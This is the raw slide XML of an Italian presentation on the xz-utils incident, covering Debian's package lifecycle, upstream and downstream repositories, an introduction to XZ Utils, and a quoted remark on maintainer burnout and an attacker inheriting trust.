                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Migration to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Testing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: package viene incluso in una distribuzione di testing;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="0"/>
              </a:lnSpc>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="2000">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Stadio </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" b="1" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Stable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: maturazione package completa, viene incluso in una versione stabile della </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>distro</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Debian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="200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3" name="Immagine 2" descr="Immagine che contiene diagramma, testo, linea, Piano&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1078966B-BBD4-730B-D54D-1C65CB0D18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2587" y="1457633"/>
            <a:ext cx="5201684" cy="5405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583681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F2AFF39-6F5A-1E50-7CDE-8AAD21C2B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167" y="3300"/>
            <a:ext cx="10524738" cy="1452552"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg2"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="4000" dirty="0"/>
              <a:t> Cosa sappiamo oggi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A698C9B-A4EA-4166-BB4E-5F2D0E1F8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AFF03-0A74-4B45-B900-A104A13AD368}" type="datetime1">
              <a:rPr lang="it-IT"/>
              <a:t>07/06/2024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B864F53-019D-926A-DB74-BA373E3FA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83DB1B8-299C-899A-BCC9-0785B184C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100</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="37" name="Segnaposto contenuto 36" descr="Immagine che contiene schizzo, diagramma, pixel&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6400CFC6-8C27-B738-B0F7-BEBC02B5C7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433" y="7285"/>
            <a:ext cx="1676961" cy="1453403"/>
          </a:xfr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C584BB4A-FACA-4161-5F39-9ECB562902C0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="138548" y="1938705"/>
            <a:ext cx="11853204" cy="403187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800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1D1D1B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Il microcosmo delle interazioni nei progetti open-source</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1D1D1B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Questo articolo di Rob </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1D1D1B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Mensching</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1D1D1B"/>
                </a:solidFill>
              </a:rPr>
              <a:t> (titolo della slide) riassume tutto l'incidente </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1D1D1B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xz-utils</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1D1D1B"/>
                </a:solidFill>
              </a:rPr>
              <a:t> in una frase:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1D1D1B"/>
              </a:solidFill>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="595D69"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="595D69"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Original</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="595D69"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="595D69"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>maintainer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="595D69"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="595D69"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>burns</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="595D69"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> out, and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="595D69"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>only</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="595D69"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="595D69"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>attacker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="595D69"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="595D69"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>offers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="595D69"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> to help </a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="595D69"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>(so </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="595D69"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>attacker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="595D69"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="595D69"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>inherits</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="595D69"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> trust </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="595D69"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>built</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="595D69"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> up by the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="595D69"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>original</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="595D69"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="595D69"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>maintainer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="595D69"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>)"</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1D1D1B"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1D1D1B"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>La mailing list di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1D1D1B"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>xz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1D1D1B"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> è un microcosmo delle interazioni nei progetti Open Source. I consumatori fanno richieste (alcuni educati, altri meno) a un manutentore (raramente due) che fa tutto.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="41663434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F2AFF39-6F5A-1E50-7CDE-8AAD21C2B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167" y="3300"/>
            <a:ext cx="10512832" cy="1452552"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg2"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="4000"/>
              <a:t> Introduzione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A698C9B-A4EA-4166-BB4E-5F2D0E1F8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AFF03-0A74-4B45-B900-A104A13AD368}" type="datetime1">
              <a:rPr lang="it-IT"/>
              <a:t>07/06/2024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B864F53-019D-926A-DB74-BA373E3FA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83DB1B8-299C-899A-BCC9-0785B184C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11</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="37" name="Segnaposto contenuto 36" descr="Immagine che contiene schizzo, diagramma, pixel&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6400CFC6-8C27-B738-B0F7-BEBC02B5C7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433" y="7285"/>
            <a:ext cx="1676961" cy="1453403"/>
          </a:xfr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C584BB4A-FACA-4161-5F39-9ECB562902C0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="92366" y="1984887"/>
            <a:ext cx="12201662" cy="273921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800" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Linux Software Release </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" b="1" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>LifeCycle</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="2800" b="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2000">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Da un punto di vista più generico, si distinguono due </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>branch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Upstream</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: repository originaria, gestita dai </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>maintainer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> del componente;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Downstream</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: repository derivata, in uso dagli </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ftpmasters</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> della specifica </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>distro</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="2400">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2400">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Immagine 6" descr="Immagine che contiene testo, diagramma, schermata, linea&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B434D7C0-CFAA-DA99-CD65-240C9D523C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6268" y="4070576"/>
            <a:ext cx="5456216" cy="2786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5703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F2AFF39-6F5A-1E50-7CDE-8AAD21C2B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167" y="3300"/>
            <a:ext cx="10524738" cy="1452552"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg2"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="4000"/>
              <a:t> Introduzione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A698C9B-A4EA-4166-BB4E-5F2D0E1F8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AFF03-0A74-4B45-B900-A104A13AD368}" type="datetime1">
              <a:rPr lang="it-IT"/>
              <a:t>07/06/2024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B864F53-019D-926A-DB74-BA373E3FA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83DB1B8-299C-899A-BCC9-0785B184C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12</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="37" name="Segnaposto contenuto 36" descr="Immagine che contiene schizzo, diagramma, pixel&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6400CFC6-8C27-B738-B0F7-BEBC02B5C7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433" y="7285"/>
            <a:ext cx="1676961" cy="1453403"/>
          </a:xfr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C584BB4A-FACA-4161-5F39-9ECB562902C0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="138548" y="1984887"/>
            <a:ext cx="11866844" cy="31085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800" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XZ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" b="1" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Utils</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" err="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="2400">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Progetto open-source nato nel 2009 e mantenuto principalmente da Lasse Collin, fondatore di The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Tukaani</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Project. Tale</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> utility è dedicata a sistemi Unix-like e, dalla sua versione 5.0.0, anche a Windows.</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XZ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Utils</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> è costituito da un set di software per la compressione lossless in formati:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>lzma</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: formato "legacy" per </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>compatilibità</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> con la LZMA-SDK di 7-Zip;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: formato nativo, caratterizzato da un alto rateo di compressione.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Immagine 2" descr="Immagine che contiene cartone animato, uccello&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CAFFAED1-6209-67FF-0517-2FD9BD05B0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9150" y="5189394"/>
            <a:ext cx="2933700" cy="146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5706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F2AFF39-6F5A-1E50-7CDE-8AAD21C2B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166" y="3300"/>
            <a:ext cx="10524739" cy="1452552"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg2"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="4000"/>
              <a:t> Introduzione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A698C9B-A4EA-4166-BB4E-5F2D0E1F8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AFF03-0A74-4B45-B900-A104A13AD368}" type="datetime1">
              <a:rPr lang="it-IT"/>
              <a:t>07/06/2024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B864F53-019D-926A-DB74-BA373E3FA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83DB1B8-299C-899A-BCC9-0785B184C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13</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="37" name="Segnaposto contenuto 36" descr="Immagine che contiene schizzo, diagramma, pixel&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6400CFC6-8C27-B738-B0F7-BEBC02B5C7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433" y="7285"/>
            <a:ext cx="1676961" cy="1453403"/>
          </a:xfr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C584BB4A-FACA-4161-5F39-9ECB562902C0}"/>
              </a:ext>
            </a:extLst>
